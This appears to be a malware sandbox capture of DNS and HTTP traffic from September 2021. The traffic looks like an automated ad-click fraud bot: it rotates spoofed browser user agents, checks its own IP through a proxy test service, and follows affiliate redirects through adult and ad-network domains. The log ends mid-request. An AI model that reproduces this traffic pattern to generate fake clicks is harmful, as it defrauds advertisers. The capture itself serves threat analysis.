GEThttp://d3ou4areduq72f.cloudfront.net/CQ29SajcgADwMCDcGNlcOcFtrWQVlBSEFWTNSA1ltIQAgU2Z7DAErETcVNlcPZQMzBFB+STcEVH5edB5HLARvH1knCjQDWSYLdB9WfgI9EF4vAzNPBQVafFoScV96Bl4tGipPBAFKYFpWLQsgBV4nSmBaAm1ffFgScC13WAcwDj8ZQi0IfxlabghrWAciSm-BaVTYGPg4ScSk+GE9xXTVDEnFfMxpHLwolD1UoBiZPBQVaYV0ZcFl3WAdrBDoeWi9KYCkScV8+A1wmSmBaUCYMOQUeZl1iGVYuHCcEUCEdPR1EJh13WHFwQWJPBXMMOhhYLgp3WHFwV3xaGXFeYF8Zcl9gTwVzAj0IXi8Kd1gHMA40C0UqSmAsAnBYfFkB-ZRpvRequestGET /CQ29SajcgADwMCDcGNlcOcFtrWQVlBSEFWTNSA1ltIQAgU2Z7DAErETcVNlcPZQMzBFB+STcEVH5edB5HLARvH1knCjQDWSYLdB9WfgI9EF4vAzNPBQVafFoScV96Bl4tGipPBAFKYFpWLQsgBV4nSmBaAm1ffFgScC13WAcwDj8ZQi0IfxlabghrWAciSm-BaVTYGPg4ScSk+GE9xXTVDEnFfMxpHLwolD1UoBiZPBQVaYV0ZcFl3WAdrBDoeWi9KYCkScV8+A1wmSmBaUCYMOQUeZl1iGVYuHCcEUCEdPR1EJh13WHFwQWJPBXMMOhhYLgp3WHFwV3xaGXFeYF8Zcl9gTwVzAj0IXi8Kd1gHMA40C0UqSmAsAnBYfFkB-ZRpv HTTP/1.1
Host: d3ou4areduq72f.cloudfront.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G920A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Accept: */*
Referer: http://getauohome.xyz/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Length: 329
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:52:36 GMT
access-control-allow-origin: *
Cache-Control: max-age=31556926
Content-Encoding: gzip
X-Cache: Miss from cloudfront
Via: 1.1 52102486f97ad6ff39f81538f01349ab.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS50-C1
X-Amz-Cf-Id: ozMNqtdJ1eseJ04NXzvleNAbHhQwGXdhHPLoPE5kbhZgSU-8EFkPAg==
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:38 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSexey.ioRequestexey.ioIN AResponseexey.ioIN A104.21.18.39exey.ioIN A172.67.180.68
-
DNSpornhub.bidRequestpornhub.bidIN AResponsepornhub.bidIN A207.180.237.38
-
DNSxnxxn.ruRequestxnxxn.ruIN AResponsexnxxn.ruIN A2.57.89.186
-
DNStubelist.vipRequesttubelist.vipIN AResponsetubelist.vipIN A167.86.121.34
-
DNSyesww.ruRequestyesww.ruIN AResponseyesww.ruIN A212.107.18.203
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
DNSsystem.simpletraffic.coRequestsystem.simpletraffic.coIN AResponsesystem.simpletraffic.coIN A172.67.72.245system.simpletraffic.coIN A104.26.10.36system.simpletraffic.coIN A104.26.11.36
-
DNSweb3.hdjav.ruRequestweb3.hdjav.ruIN AResponseweb3.hdjav.ruIN CNAMEhdjav.ruhdjav.ruIN A167.86.103.60
-
DNSfreychang.funRequestfreychang.funIN AResponsefreychang.funIN A104.21.45.207freychang.funIN A172.67.218.221
-
DNSwww3.freeslut.xyzRequestwww3.freeslut.xyzIN AResponsewww3.freeslut.xyzIN A194.59.164.58
-
GEThttp://tubelist.vip/index.htmlRequestGET /index.html HTTP/1.1
Host: tubelist.vip
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; NP06; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:41 GMT
Content-Type: text/html
Content-Length: 215
Last-Modified: Wed, 01 Sep 2021 07:02:23 GMT
Connection: keep-alive
ETag: "612f257f-d7"
Accept-Ranges: bytes
-
GEThttp://web3.hdjav.ru/ungweb3.phpRequestGET /ungweb3.php HTTP/1.1
Host: web3.hdjav.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:52.9) Gecko/20100101 Goanna/3.4 Firefox/52.9 PaleMoon/27.8.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSyahoodisplay873773666324.s.moatpixel.comRequestyahoodisplay873773666324.s.moatpixel.comIN AResponseyahoodisplay873773666324.s.moatpixel.comIN CNAMEmoatpixel1.edgekey.netmoatpixel1.edgekey.netIN CNAMEe13136.d.akamaiedge.nete13136.d.akamaiedge.netIN A2.18.106.161
-
GEThttp://tracking.leomob.com/track?awno=lm133&oid=3236727&devid=b30a2366-d14c-4edc-ab7b-8469b6fa58ee&aff_sub=04l969Qwt8vv0_QqtrUUAmj1HM9QdjNk&subUuid=1136301_452RequestGET /track?awno=lm133&oid=3236727&devid=b30a2366-d14c-4edc-ab7b-8469b6fa58ee&aff_sub=04l969Qwt8vv0_QqtrUUAmj1HM9QdjNk&subUuid=1136301_452 HTTP/1.1
Host: tracking.leomob.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SM-J260T1 Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/81.0.4044.117 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Requested-With: com.android.chrome
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:52:45 GMT
Content-Length: 0
Connection: keep-alive
Server: Tengine/2.2.2
Location: https://ccapi.g2afse.com/click?pid=167&offer_id=1349085&sub1=postback1325399cc%257B%2522devid%2522%253A%2522b30a2366-d14c-4edc-ab7b-8469b6fa58ee%2522%252C%2522aff_sub%2522%253A%252204l969Qwt8vv0_QqtrUUAmj1HM9QdjNk%2522%252C%2522awno%2522%253A%2522lm133%2522%252C%2522subUuid%2522%253A%25221136301_452%2522%252C%2522oid%2522%253A%25223236727%2522%252C%2522awt%2522%253A%2522noinxnnkjnqwnx%2522%252C%2522rip%2522%253A%2522154.61.71.51%2522%257D&sub2=lm1331136301_452&sub5=
Content-Language: en-US
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:45 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSlogger007.cam4.comRequestlogger007.cam4.comIN AResponselogger007.cam4.comIN A184.94.152.23
-
DNSeu.dspultra.comRequesteu.dspultra.comIN AResponseeu.dspultra.comIN A139.45.197.203eu.dspultra.comIN A139.45.197.201
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
DNSyaojav.comRequestyaojav.comIN AResponseyaojav.comIN A104.21.52.235yaojav.comIN A172.67.205.115
-
GEThttp://alfad.pro/go/266933/627611RequestGET /go/266933/627611 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:52:48 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
DNSmphotos.xyzRequestmphotos.xyzIN AResponsemphotos.xyzIN A62.171.142.250
-
DNStubelist.vipRequesttubelist.vipIN AResponsetubelist.vipIN A167.86.121.34
-
GEThttp://eu.dspultra.com/api/submit_form_request?p=27402603-0a83-4844-9d76-401b1cb06e84&ts=1630921882&z=4345477RequestGET /api/submit_form_request?p=27402603-0a83-4844-9d76-401b1cb06e84&ts=1630921882&z=4345477 HTTP/1.1
Host: eu.dspultra.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://weightlose.tw/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff
Timing-Allow-Origin: *
-
DNSefreecode.comRequestefreecode.comIN AResponseefreecode.comIN A18.208.5.78
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSdiabasewoodhouse.xyzRequestdiabasewoodhouse.xyzIN AResponsediabasewoodhouse.xyzIN A34.196.13.28
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
GEThttp://alfad.pro/go/266933/626162RequestGET /go/266933/626162 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 OPR/39.0.2256.71
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:52:48 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
DNSwww1.nakedwife.xyzRequestwww1.nakedwife.xyzIN AResponsewww1.nakedwife.xyzIN A194.59.164.58
-
GEThttp://diabasewoodhouse.xyz/?k=051847d57afcd076644da985057a35f1.1630921862.131.2.1.cmV0cmlidXRpb25zYWxvb24ueHl6&r=&z=-480RequestGET /?k=051847d57afcd076644da985057a35f1.1630921862.131.2.1.cmV0cmlidXRpb25zYWxvb24ueHl6&r=&z=-480 HTTP/1.1
Host: diabasewoodhouse.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Server: nginx
Date: Mon, 06 Sep 2021 09:52:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: tpp_u=0%3B1631008368; expires=Wed, 08-Sep-2021 09:52:48 GMT; path=/
Set-Cookie: tpp_6561771_l=1295%3B1631008368; expires=Wed, 08-Sep-2021 09:52:48 GMT; path=/
Set-Cookie: tpp_ov=102611%3B1631008368; expires=Wed, 08-Sep-2021 09:52:48 GMT; path=/
Set-Cookie: tpp_ov=102611%2C102652%3B1631008368; expires=Wed, 08-Sep-2021 09:52:48 GMT; path=/
Set-Cookie: tpp_ov=102611%2C102652%2C103109%3B1631008368; expires=Wed, 08-Sep-2021 09:52:48 GMT; path=/
Expires: Mon, 31 Dec 2001 23:59:59 GMT
Pragma: no-cache
Set-Cookie: tpp_oc=103109%3B1631008368; expires=Wed, 08-Sep-2021 09:52:48 GMT; path=/
Location: http://www.signupandturnyourscreenoffsafepowernow.date/zzz?yqsp=u5ARjqQKdv6zke0GG7LdkA0khF8jfuCy4l_DA5qciZZqkzFRtE4gGnbdZCQdGFK5uMDFI_ZNQiA7WvdcbQk0pA..&sid=&subid=103109_4bae97e155463612e2fe01be069ba16f
-
GEThttp://alfad.pro/go/266933/619593RequestGET /go/266933/619593 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://web4.sexybody.xyz/ungweb4.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:52:48 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 326
Connection: keep-alive
-
GEThttp://nsparket.top/redirect?tid=917720RequestGET /redirect?tid=917720 HTTP/1.1
Host: nsparket.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://sexy-wife.com/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:52:48 GMT
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
cache-control: no-store, no-cache, must-revalidate, no-transform
pragma: no-cache
p3p: CP="NID DSP ALL COR"
set-cookie: csu=55763141-dba5-4740-aefb-15e095b5c701
location: https://xml.bid-engine.com/click?i=x1pWHzvwf08_0
x-cache: Miss from cloudfront
via: 1.1 32f32412600ac6ef6d3d418a75accb72.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS50-C1
x-amz-cf-id: XKz3ITwvwicYfWei28q1kYqgwAkOyt7cLLpDLQK0eHrOaYsiZY8CDQ==
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FtQfehDkWgnc2fK4h8PJDeqCReEYKm6g0o9BGg%2FnpSmd68%2FTW3yUFfl5WFL4JGiXjE29q5IW4%2FPu%2BKr%2BTpNW1TJXGzM%2BvbDhFvlcY6g3xfEGWlB37lEpcLxsCb6wrEw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6ce7bcbed41ae-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
GEThttp://tubelist.vip/index.htmlRequestGET /index.html HTTP/1.1
Host: tubelist.vip
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; GWX:QUALIFIED)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:47 GMT
Content-Type: text/html
Content-Length: 215
Last-Modified: Wed, 01 Sep 2021 07:02:23 GMT
Connection: keep-alive
ETag: "612f257f-d7"
Accept-Ranges: bytes
-
GEThttp://mphotos.xyz/ff.phpRequestGET /ff.php HTTP/1.1
Host: mphotos.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://alfad.pro/go/266933/627547RequestGET /go/266933/627547 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 YaBrowser/18.6.1.392 (beta) Yowser/2.5 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:52:48 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://yaojav.com/adv.htmlRequestGET /adv.html HTTP/1.1
Host: yaojav.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
GEThttp://alfad.pro/go/266933/627596RequestGET /go/266933/627596 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:52:49 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
DNSpetscolect.comRequestpetscolect.comIN AResponsepetscolect.comIN A45.76.17.70
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A172.67.75.150monitor.capmonster.appIN A104.26.2.167
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.110millustry.topIN A13.227.222.89millustry.topIN A13.227.222.102millustry.topIN A13.227.222.73
-
DNSlangmm.infoRequestlangmm.infoIN A
-
DNSlangmm.infoRequestlangmm.infoIN A
-
DNSlangmm.infoRequestlangmm.infoIN A
-
DNSlangmm.infoRequestlangmm.infoIN A
-
DNSlangmm.infoRequestlangmm.infoIN A
-
DNS789ff.infoRequest789ff.infoIN AResponse789ff.infoIN A5.181.218.143
-
DNSlangmm.ruRequestlangmm.ruIN AResponselangmm.ruIN A212.107.18.203
-
GEThttp://nsparket.top/redirect?tid=922613RequestGET /redirect?tid=922613 HTTP/1.1
Host: nsparket.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://hubtube.ru/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:52:54 GMT
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
cache-control: no-store, no-cache, must-revalidate, no-transform
pragma: no-cache
p3p: CP="NID DSP ALL COR"
set-cookie: csu=ce624835-3ef4-40bb-8d84-6f4ef8685692
location: https://mignished-sility.com/3a00b0b8-dfa6-4533-a9b0-d669e725d7d7?conversion=1828931789868584763&zoneid=922613
x-cache: Miss from cloudfront
via: 1.1 ff34f581ad0f4009e4c404975952e7f0.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS50-C1
x-amz-cf-id: pRF2UESPa5eyHkrguH0HaVMWC8ioQeNdrrIzQvr-aas902Sspz8ksg==
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MK8P8QMCIkOaF4ozFb31bxQtvvG9igDJ6rEVeoiFDRx4IwNV0a8u3BrBkzyrcwZ6hZSbzf6JnXcwC3iu%2BJibmdEHXZd6NGK58rJqelAEM51QSrzm7AL8dvUIf6gqwnI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6cea149ae414e-AMS
alt-svc: h2=":443"; ma=60
-
GEThttp://millustry.top/redirect?tid=936651RequestGET /redirect?tid=936651 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: com.google.GoogleMobile/119.0 iPhone/13.6 hw/iPhone11_6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://javfor.xyz/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csu=b3bcaf9f-eea7-44a9-a69b-e9c8cf0d9940
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A172.67.75.150
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:56 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:59 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSyaojav.comRequestyaojav.comIN AResponseyaojav.comIN A104.21.52.235yaojav.comIN A172.67.205.115
-
DNSyesde.xyzRequestyesde.xyzIN AResponseyesde.xyzIN A212.107.18.203
-
DNSjav69.vipRequestjav69.vipIN AResponsejav69.vipIN A167.86.121.34
-
DNSmasde.infoRequestmasde.infoIN AResponsemasde.infoIN A212.107.18.203
-
DNSweb.xpornsite.xyzRequestweb.xpornsite.xyzIN AResponseweb.xpornsite.xyzIN A194.59.164.58
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSporn6.xnxxn.ruRequestporn6.xnxxn.ruIN AResponseporn6.xnxxn.ruIN A2.57.89.186
-
DNSrecaptcha.netRequestrecaptcha.netIN AResponserecaptcha.netIN A216.58.208.99
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSdryteen.usRequestdryteen.usIN AResponsedryteen.usIN A207.180.237.38
-
DNSnakedwife.xyzRequestnakedwife.xyzIN AResponsenakedwife.xyzIN A194.59.164.58
-
DNSfreejav.ruRequestfreejav.ruIN AResponsefreejav.ruIN A167.86.103.60
-
DNSmomav.usRequestmomav.usIN AResponsemomav.usIN A207.180.237.38
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:00 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSbeautyhealth.ccRequestbeautyhealth.ccIN AResponsebeautyhealth.ccIN A207.180.237.38
-
GEThttp://dryteen.us/index.htmRequestGET /index.htm HTTP/1.1
Host: dryteen.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:59 GMT
Content-Type: text/html
Content-Length: 292
Last-Modified: Thu, 13 May 2021 09:17:18 GMT
Connection: keep-alive
ETag: "609cee9e-124"
Accept-Ranges: bytes
-
DNS789ff.ruRequest789ff.ruIN AResponse789ff.ruIN A172.67.176.50789ff.ruIN A104.21.31.100
-
DNSmaoss.infoRequestmaoss.infoIN AResponsemaoss.infoIN A5.181.218.143
-
GEThttp://jav69.vip/index.htmlRequestGET /index.html HTTP/1.1
Host: jav69.vip
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:52:59 GMT
Content-Type: text/html
Content-Length: 264
Last-Modified: Tue, 24 Aug 2021 09:27:17 GMT
Connection: keep-alive
ETag: "6124bb75-108"
Accept-Ranges: bytes
-
GEThttp://alfad.pro/go/266933/629271RequestGET /go/266933/629271 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
